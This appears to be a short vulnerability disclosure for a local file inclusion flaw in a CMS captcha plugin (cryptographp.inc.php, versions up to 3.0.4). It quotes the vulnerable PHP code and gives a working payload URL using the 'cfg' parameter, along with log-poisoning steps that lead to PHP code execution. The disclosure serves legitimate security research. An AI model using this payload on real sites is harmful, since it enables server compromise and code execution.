Reason of This Vulnerability
Directly from the get parameter and include this parameter, resulting in a vulnerability,Vulnerability file:
plugins\captcha\crypt\cryptographp.inc.php
#..\plugins\captcha\crypt\cryptographp.inc.php
if (( ! isset($_COOKIE['cryptcookietest'])) and ($_GET[$_GET['sn']] == "")) {
header("Content-type: image/png");
readfile('images/erreur3.png');
exit;
}
if ($_GET[$_GET['sn']] == "") { unset ($_GET['sn']); }
session_start();
// Takes only the configuration files in the same directory
if ($_GET['cfg'] ) { $_SESSION['configfile']=$_GET['cfg']; } else { $_SESSION['configfile'] = "cryptographp.cfg.php"; }
include($_SESSION['configfile']);
As long as we assign a value to the sn variable and it is not empty, we can skip the first 2 if syntax,The variable CFG is directly assigned to configFile, and then the include method is executed, resulting in a vulnerability
Brief of this vulnerability There is a local File Inclusion Vulnerability in the CMS, which can be exploited by an attacker to execute PHP code
Test Environment
Affect version <=3.0.4
payload
We can create phpinfo.txt In the web directory, the content is
<?php phpinfo();?>Or we can use Apache logs
use burpsuite
include log http://127.0.0.1/plugins/captcha/crypt/cryptographp.inc.php?sn=exp&exp=1&cfg=I:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log
Reason of This Vulnerability Directly from the get parameter and include this parameter, resulting in a vulnerability,Vulnerability file:
plugins\captcha\crypt\cryptographp.inc.phpAs long as we assign a value to the sn variable and it is not empty, we can skip the first 2 if syntax,The variable CFG is directly assigned to configFile, and then the include method is executed, resulting in a vulnerability